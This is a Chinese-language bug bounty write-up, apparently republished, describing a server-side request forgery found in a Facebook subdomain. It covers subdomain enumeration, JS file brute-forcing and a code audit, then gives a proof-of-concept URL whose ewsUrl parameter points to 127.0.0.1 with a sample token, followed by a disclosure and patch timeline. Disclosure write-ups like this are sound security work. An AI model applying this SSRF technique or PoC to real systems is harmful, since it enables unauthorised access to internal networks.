$ 10000 Facebook SSRF(Bug赏金)

华盟原创文章投稿奖励计划

文章来源:EDI安全

01

目录

子域枚举+文件暴力+ JS分析= $ 10KSSRF

这是我在Facebook上发现的有关SSRF漏洞的文章。

漏洞可能允许恶意用户向Facebook公司网络发送内部请求。

$ 10000 Facebook SSRF(Bug赏金)

02

子域枚举

通过进行一些子域枚举,我找到了以下子域:phishme.thefacebook.com.

$ 10000 Facebook SSRF(Bug赏金)

03

js分析

通过使用自定义的单词列表并强制执行以下路径:

https://phishme.thefacebook.com/ ** .js

我找到了一个隐藏的Home.js文件

(https://phishme.thefacebook.com/Home.js)

04

代码审计

通过 分析Home.js文件的代码,我发现了一个有趣的函数“ sendPhishRequest”,该函数使用XMLHttpRequest从某些特定链接中请求数据

通过深入研究代码,我发现此功能的用法如下:

Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }

05

exp

在尝试了几种随机token格式之后,我终于能够成功利用该错误发送内部请求。

itemId: 123ewsUrl: http://127.0.0.1:PORTtoken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

poc:

https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

$ 10000 Facebook SSRF(Bug赏金)

06

结果

  • 2020年8月7日:报告

  • 2020年8月11日:已审核

  • 2020年8月11日:修补

  • 2020年12月3日:已解决

  • 华盟知识星球入口

    2020年12月3日:10000美元赏金

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/275501.html

发表评论